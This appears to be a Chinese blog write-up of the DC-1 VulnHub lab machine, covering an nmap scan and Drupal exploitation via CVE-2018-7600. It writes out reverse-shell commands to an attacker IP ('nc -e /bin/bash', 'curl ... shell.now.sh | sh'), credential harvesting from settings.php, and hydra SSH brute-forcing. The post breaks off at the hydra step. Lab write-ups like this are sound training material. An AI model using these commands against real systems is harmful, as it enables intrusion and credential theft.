DC靶场1-6

靶机下载:

https://download.vulnhub.com/dc/

环境配置:

在VM以net连接打开虚拟机

使用的机器:

攻击机:kali linux 靶机:DC1,2,4,5,6(IP随配)

 

DC1

1.nmap扫描端口

nmap -sS -A 192.168.119.135

2. 访问页面,收集信息

http://192.168.119.135:80

F12查看版本信息

去网上搜索,发现此版本存在一个CVE漏洞(CVE-2018-7600)

3. 反弹shell

1)搜索相关脚本,运行,直接反弹shell https://github.com/pimps/CVE-2018-7600 执行命令: python drupa7-CVE-2018-7600.py http://192.168.119.135/ -c 'nc -e /bin/bash 192.168.119.129 4444'

2)当然,小编建议还是使用python反弹shell,不要问我为什么,我是后面才造python反弹的shell要好一些 python反弹shell命令

反弹 curl https://shell.now.sh/192.168.119.129:4444 |sh
获得shell后,输入:python -c 'import pty; pty.spawn("/bin/bash")'

3)使用msf自带的exp,获得shell

4.获得flag1

获得shell后,直接显示当前目录查看文件

查看flag1.txt

5.获得flag2

根据flag1.txt提示,查找drupal的配置文件 网上搜索,在 /var/www/site/default/settings.php

6.获得flag4

根据 flag2 提示要爆破,还显示了数据库的账号,密码,尝试连接数据库 到了这里,我想我上面在反弹shell那里就建议使用第二种的用处到来了,如果是使用python直接反弹shell,那么就可以直接使用命令连接数据库

但是,若是第一种,和msf方法的话,我想,是不大好连的 所以小编我就独辟蹊径,先去拿到flag4 flag4的位置在/home目录下 查看flag4.txt

从提示的信息来看,我们flag在root里面,还是通过find方法获得root权限 但是,这样还是不够的,小编还是想要按着步骤来,想办法找到flag3 顺道,查看一下/etc/passwd有没有可以远程登陆的账号

看到有flag4这个账号,使用hydra尝试ssh密码爆破

hydra -l flag4 -P /usr/share/john/password.lst -t 6 ssh://192.168.119.135

  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值